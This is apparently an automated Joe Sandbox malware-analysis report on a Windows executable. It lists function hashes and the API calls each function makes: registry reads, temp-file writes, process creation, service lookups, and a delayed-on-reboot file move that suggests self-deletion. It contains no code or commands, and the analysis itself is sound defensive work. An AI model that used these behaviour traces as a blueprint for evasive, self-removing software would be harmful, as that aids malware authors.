• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID:
• String ID: $ $ $#$#$$$$$%$&$&$&$'$($)$*$/$0$1$2$5$7$8$8$;$=$=$>$?$?$D$H$I$M$M$N$N$N$N$P$P$P$P$P$Q$R$S$S$S$T$T$W$\$]$^$^$^$^c$`$`$a$b$b$c$c$d$d$e$f$g$g$h$h$i$i$i$j$k$m$o$o$p$p$q$r$r$r$r$s$s$s|pd$t$t$u$u$v$v$z$z${${$|$|$|$}$~$~$~
• API String ID: 0-2533205990
• Opcode ID: e2622106f891706df351979d41e9d59cfc6c36af9e9f3dcf4f33d23ff2114f6b
• Instruction ID: 40aa9fcbbacb4e662069c3f6a830727ea6aa88fb999cbe6da6f2476ebe5119cf
• Opcode Fuzzy Hash: e2622106f891706df351979d41e9d59cfc6c36af9e9f3dcf4f33d23ff2114f6b
• Instruction Fuzzy Hash: D962C32010D7C189D332C77C984879FBFD15BA7228F584A9DE1E85B2E3D2AA8149C767

Control-flow Graph (graph image not recoverable)

APIs
• GetProcessHeap.KERNEL32(00000008,000000FF), ref: 00420217
• HeapAlloc.KERNEL32(00000000), ref: 0042021E
• RegOpenKeyExA.ADVAPI32(80000002,00000006,00000000,00000001,00000000), ref: 0042023E
• GetLastError.KERNEL32 ref: 00420248
• RegQueryValueExA.ADVAPI32(000000FF,00000000,00000000,00000000,00000000,?), ref: 00420286
• GetLastError.KERNEL32 ref: 00420290
• GetProcessHeap.KERNEL32(00000000,00000000,?,00431CCC,?,00431CCC,?,?,?,?,?,00000001), ref: 004203CA
• HeapFree.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 004203D1
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000001), ref: 004203DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: Heap$ErrorLastProcess$AllocCloseFreeOpenQueryValue
• String ID: $!$$$'$($,$-$0$2$3$4$4$:$:$A$A$C$D$G$H$I$L$S$S$Y$[$\$]$a$b$e$e$g$h$i$m$p$p$q$t$u$v$v$w$y$z${${$|$}$}
• API String ID: 1434707997-4021543146
• Opcode ID: 29d92220c5e11e6036931e209fc08ce3f9ddb880bb74b97bf96d4e468b4b4558
• Instruction ID: 8a31240bc7adcf6ea3cc165c57d100c60a11fb3bc5011af5590440d63b5ba69d
• Opcode Fuzzy Hash: 29d92220c5e11e6036931e209fc08ce3f9ddb880bb74b97bf96d4e468b4b4558
• Instruction Fuzzy Hash: 6D12072110D7C1CDD332C779984879BBFD55BA7228F485A9DE1E84B2E3C3A98109C76B

Control-flow Graph (graph image not recoverable)

Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID:
• String ID: $$%$&$'$($/$2$5$=$=$>$?$I$N$N$P$P$Q$R$S$S$T$]$^$^$`$b$c$d$e$g$h$i$i$o$p$r$r$s$t$u$v${$|$}$~
• API String ID: 0-2688660894
• Opcode ID: 1abc28a2f8c18677790b7c21e6b3aee0d4b5a8bd8af1e207959e33944dc72c7b
• Instruction ID: abd944b4bf66b48f6ff19b161d47c379f6673315fd2279abf8dc63a53f241184
• Opcode Fuzzy Hash: 1abc28a2f8c18677790b7c21e6b3aee0d4b5a8bd8af1e207959e33944dc72c7b
• Instruction Fuzzy Hash: 6EF10A2010D7C18AD332CB789848B9FBFD55BA6314F484AADE1D95B2E3D3B98109C727

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,000000FF), ref: 00421857
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0042185E
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,000000A2,00000000,00000001,00000000), ref: 00421878
                                                                  • GetLastError.KERNEL32 ref: 00421888
                                                                  • RegQueryValueExA.ADVAPI32(?,0000000C,00000000,000000F7,00000000,?), ref: 004218A6
                                                                  • GetLastError.KERNEL32 ref: 004218B0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHeapLast$AllocOpenProcessQueryValue
                                                                  • String ID: $"$#$&$)$*$+$0$@$E$E$L$M$N$O$P$P$S$T$W$Z$^$c$d$e$e$i$i$i$j$n$o$r$s$t$t$u$v$v
                                                                  • API String ID: 1776519057-2463442936
                                                                  • Opcode ID: ab6827ab39422699bea6bda1d347a6bd827d59bc8c8f8bf468672a2f9e6538a5
                                                                  • Instruction ID: de080bc917b6dafc203796a283a93a50a3f41381c7ced34f7cef138a8a95d9cd
                                                                  • Opcode Fuzzy Hash: ab6827ab39422699bea6bda1d347a6bd827d59bc8c8f8bf468672a2f9e6538a5
                                                                  • Instruction Fuzzy Hash: D4D13C6110C7C1CDD322D778988879FBFD15BA6218F484E9DF1E45B3E2D2A98109C76B

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "$'$($/$/$0$1$2$4$6$:$?$F$U$Y$Z$b$c$c$c$d$h$i$o$t$t$v$y$y$z${${
                                                                  • API String ID: 0-1086536751
                                                                  • Opcode ID: b412046be1c6318884bb58681997ee504ed99bbc7bdc58cc31c50f8f500c8cb2
                                                                  • Instruction ID: 11e3b4fdb97899335a1116277c19ae4b67f777c444ac700ec2618231df2b17f2
                                                                  • Opcode Fuzzy Hash: b412046be1c6318884bb58681997ee504ed99bbc7bdc58cc31c50f8f500c8cb2
                                                                  • Instruction Fuzzy Hash: 9AD1492010C7C19ED322DB79984865FBFD45BA6218F485F9DF1E44B3E3D2A9810AC76B

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004150AB
                                                                    • Part of subcall function 00413AD0: SetEvent.KERNEL32(0000011C,?,00000000,00000001,00415108), ref: 0041EF12
                                                                    • Part of subcall function 00413AD0: SetEvent.KERNEL32(00000128), ref: 0041EF20
                                                                    • Part of subcall function 00413AD0: SetEvent.KERNEL32(0000012C), ref: 0041EF2B
                                                                    • Part of subcall function 00413AD0: SetEvent.KERNEL32(00000124), ref: 0041EF36
                                                                    • Part of subcall function 00413AD0: SetEvent.KERNEL32(00000120), ref: 0041EF41
                                                                    • Part of subcall function 004120C0: ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000001), ref: 004121E0
                                                                    • Part of subcall function 004120C0: GetFileAttributesA.KERNEL32(?), ref: 004121FF
                                                                    • Part of subcall function 00413DD0: Sleep.KERNEL32(0002BF20,00000000), ref: 00413E62
                                                                    • Part of subcall function 00412B30: ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000000), ref: 00412C26
                                                                    • Part of subcall function 00412B30: GetLocalTime.KERNEL32(0000003C), ref: 00412C31
                                                                    • Part of subcall function 00412B30: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00412C4B
                                                                    • Part of subcall function 00412B30: WriteFile.KERNEL32(00000000,000000E6,00000010,0000003C,00000000), ref: 00412C62
                                                                    • Part of subcall function 00412B30: CloseHandle.KERNEL32(00000000), ref: 00412C69
                                                                    • Part of subcall function 00413280: RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00413420
                                                                    • Part of subcall function 00413280: RegDeleteValueA.ADVAPI32(?,?), ref: 00413451
                                                                    • Part of subcall function 00413280: RegCloseKey.ADVAPI32(?), ref: 0041345C
                                                                    • Part of subcall function 00413280: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00413472
                                                                    • Part of subcall function 00413280: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0041348A
                                                                    • Part of subcall function 0041EF50: ResetEvent.KERNEL32(0000011C,?,00000000,00000001,00415134), ref: 0041EF67
                                                                    • Part of subcall function 0041EF50: ResetEvent.KERNEL32(00000128), ref: 0041EF76
                                                                    • Part of subcall function 0041EF50: ResetEvent.KERNEL32(0000012C), ref: 0041EF81
                                                                    • Part of subcall function 0041EF50: ResetEvent.KERNEL32(00000124), ref: 0041EF8C
                                                                    • Part of subcall function 0041EF50: ResetEvent.KERNEL32(00000120), ref: 0041EF97
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Event$File$Reset$CloseEnvironmentExpandModuleNameStrings$AttributesCreateDeleteHandleLocalMoveOpenSleepTimeValueWrite
                                                                  • String ID: $'$0$1$4$:$<$D$F$O$V$Y$^$_$h$m$s$t$x$x$x$z${$}
                                                                  • API String ID: 2834431147-455679219
                                                                  • Opcode ID: 1f6e772e3f605208dfee7bf4d0ea2b6ea15f5f842e9da9fe72f42dc6b594ce41
                                                                  • Instruction ID: 303c94e765967613df6afeb7444a04bb2175ba7380c9a58d85960b8bb2ad4b0c
                                                                  • Opcode Fuzzy Hash: 1f6e772e3f605208dfee7bf4d0ea2b6ea15f5f842e9da9fe72f42dc6b594ce41
                                                                  • Instruction Fuzzy Hash: 8AE1482120C7C089D33297399848BDBBFD55FE6318F584A9EE1E88B2D3C6B58149C767

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,00000000,?,0000007B), ref: 00412643
                                                                  • GetTempFileNameA.KERNELBASE(?,0042E292,00000000,?,?,0000007B), ref: 00412660
                                                                    • Part of subcall function 0040C1D0: GetTickCount.KERNEL32 ref: 0040C1DA
                                                                    • Part of subcall function 0040C1D0: GetTickCount.KERNEL32 ref: 0040C1E8
                                                                    • Part of subcall function 0040C1D0: GetTickCount.KERNEL32 ref: 0040C1F6
                                                                    • Part of subcall function 0040C1D0: GetTickCount.KERNEL32 ref: 0040C204
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,0000007B), ref: 00412681
                                                                  • HeapAlloc.KERNEL32(00000000,?,0000007B), ref: 00412684
                                                                  • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,0000007B), ref: 004126C6
                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,0000007B), ref: 004126D8
                                                                  • CloseHandle.KERNEL32(00000000,?,0000007B), ref: 004126E5
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,0000007B), ref: 004126EA
                                                                  • HeapFree.KERNEL32(00000000,?,0000007B), ref: 004126ED
                                                                  • ExpandEnvironmentStringsA.KERNELBASE(0000004F,?,00000208), ref: 00412920
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CountHeapTick$File$Process$AllocCloseCreateCurrentDirectoryEnvironmentExpandFreeHandleNameStringsTempWrite
                                                                  • String ID: '$)$4$7$<$A$D$I$K$N$O$W$\$_$j$x
                                                                  • API String ID: 1204127460-4239860483
                                                                  • Opcode ID: e9142f7ef01560981e5ace9b92d93c22cb7fba4bdb225b2538245e4787c0e303
                                                                  • Instruction ID: fc50ba5ee65d84b0438dc11ee2d5e43eb154a7910d067eaa4cf43abc5e739b9a
                                                                  • Opcode Fuzzy Hash: e9142f7ef01560981e5ace9b92d93c22cb7fba4bdb225b2538245e4787c0e303
                                                                  • Instruction Fuzzy Hash: 03A15E2110C7C19ED33197399889BDBBFD45FA7214F184AADE2E8872D3C6B5440ACB67

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32 ref: 00421C2A
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00421C2D
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,000000A2,00000000,00000001,00000000), ref: 00421C48
                                                                  • GetLastError.KERNEL32 ref: 00421C58
                                                                  • RegQueryValueExA.ADVAPI32(?,00000057,00000000,00000000,00000000,?), ref: 00421C77
                                                                  • GetLastError.KERNEL32 ref: 00421C81
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00431D8C,?,?,?,?,?,00000001), ref: 00421D20
                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 00421D23
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000001), ref: 00421D2E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$ErrorLastProcess$AllocCloseFreeOpenQueryValue
                                                                  • String ID: #$$$&$)$*$;$>$H$N$R$S$T$V$W$^$r$s$t$u
                                                                  • API String ID: 1434707997-1823157150
                                                                  • Opcode ID: 6e08b74d57cc105e2010b4ea5f959d3cf0c0668fc3babe88880cece8b4c20fe2
                                                                  • Instruction ID: fa9cfd876d3b6e4b553c796e2fcc97387f4aba46f10f049a185be6cbd934e7b4
                                                                  • Opcode Fuzzy Hash: 6e08b74d57cc105e2010b4ea5f959d3cf0c0668fc3babe88880cece8b4c20fe2
                                                                  • Instruction Fuzzy Hash: E1A17A6110D3C19ED322DB79A884B9BBFD45FA6208F481EADF0D487393D2A5C108C76B

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,000000FF,?), ref: 0041FBF0
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041FBF7
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000006,00000000,00000001,74DF0A60), ref: 0041FC14
                                                                  • GetLastError.KERNEL32 ref: 0041FC24
                                                                  • RegQueryValueExA.ADVAPI32(?,000000E5,00000000,00000000,00000000,?), ref: 0041FC40
                                                                  • GetLastError.KERNEL32 ref: 0041FC4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHeapLast$AllocOpenProcessQueryValue
                                                                  • String ID: Z$c$d$i$t$v$y${
                                                                  • API String ID: 1776519057-3640894087
                                                                  • Opcode ID: f6d11a2ddb12440592e01084a58bb70fe86f7cf8f6f4206307d0c26f565b6ce2
                                                                  • Instruction ID: 17e8e7697b2e3bef17a3567bbfa0b456d59c673bdf2ae35ddef1ee050250fe48
                                                                  • Opcode Fuzzy Hash: f6d11a2ddb12440592e01084a58bb70fe86f7cf8f6f4206307d0c26f565b6ce2
                                                                  • Instruction Fuzzy Hash: 7351CF7110C3C08ED311DB689855B9BFFE5AF99708F044E6EE1C587292D7B98109CB6B

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,80000000,00000000,?,?,?,?,?,?,?,0041FCCD,?,00431CAC), ref: 0041F02D
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0041FCCD,?,00431CAC,?,?,?,?,?,00000001), ref: 0041F039
                                                                  • OpenServiceA.ADVAPI32(00000000,?,00000004,00431C98,?,?,?,?,?,?,?,0041FCCD,?,00431CAC), ref: 0041F057
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0041FCCD,?,00431CAC,?,?,?,?,?,00000001), ref: 0041F063
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,0041FCCD,?,00431CAC), ref: 0041F070
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastOpenService$CloseHandleManager
                                                                  • String ID:
                                                                  • API String ID: 48634454-0
                                                                  • Opcode ID: a2892d7f7661b13cf73e8cd547c792104bc9d4b467d401adbc5d1c83def5ba12
                                                                  • Instruction ID: f3cf9168e74de08882df1071f672c22a0612c2c306f6c0820370a697ac743aba
                                                                  • Opcode Fuzzy Hash: a2892d7f7661b13cf73e8cd547c792104bc9d4b467d401adbc5d1c83def5ba12
                                                                  • Instruction Fuzzy Hash: 27217C36701220ABD321AB69DC49B9F7BE4EFD9750F80442AFA41D7350D7B09847CBA6

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNELBASE(0000004F,?,00000208), ref: 00412920
                                                                  • lstrcatA.KERNEL32(?,0042E3F8), ref: 00412939
                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041294B
                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00412989
                                                                  • CloseHandle.KERNEL32(?), ref: 00412994
                                                                  • CloseHandle.KERNEL32(?), ref: 0041299B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandlelstrcat$CreateEnvironmentExpandProcessStrings
                                                                  • String ID: D
                                                                  • API String ID: 249013821-2746444292
                                                                  • Opcode ID: d510ec59f7870d519bf324aab472407a7ecdcd160f1fdcfa20edfd7c1420eeda
                                                                  • Instruction ID: 1d206c3ebca1a40486939c7928fd3c0a5193cdd2c06ff6f9138d119af16f5955
                                                                  • Opcode Fuzzy Hash: d510ec59f7870d519bf324aab472407a7ecdcd160f1fdcfa20edfd7c1420eeda
                                                                  • Instruction Fuzzy Hash: 74315E7610C3845BD321AB29A494BEBFBE9AFD6218F288DBDD5C4C3243D6718409CB57
                                                                  APIs
